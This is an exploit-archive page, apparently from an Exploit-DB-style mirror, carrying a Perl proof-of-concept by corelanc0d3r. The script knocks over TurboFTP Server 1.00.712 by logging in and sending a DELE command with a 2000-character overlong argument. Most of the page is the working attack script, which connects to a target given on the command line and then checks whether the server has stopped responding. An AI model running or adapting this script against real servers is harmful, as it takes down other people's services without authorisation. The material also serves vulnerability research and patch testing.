[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : TurboFTP Server 1.00.712 Remote DoS
# Published : 2010-01-13
# Author : corelanc0d3r
# Previous Title : Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability
# Next Title : NPlayer (.dat Skin File) Local Heap Overflow PoC 


# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|n";
print "|                         __               __                       |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] DoS exploit for TurboFTP Server 1.00.712 n";

use IO::Socket; 

if ($#ARGV ne 3) { 
print "n  usage: $0 <targetip> <targetport> <user> <password>n"; 
exit(0); 
} 

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payloadn";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 

$ftp = <$sock> || die " [!] *** Unable to connect ***n"; 
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)n";
print $sock "USER $userrn"; 
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $passrn"; 
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payloadn";
print $sock "DELE ".$payload."rn";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server staten";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 
my $ftp2 = <$sock2> || die " [+] DoS successfuln";
print " [!] DoS did not seem to workn";
print "   ** $ftp2n";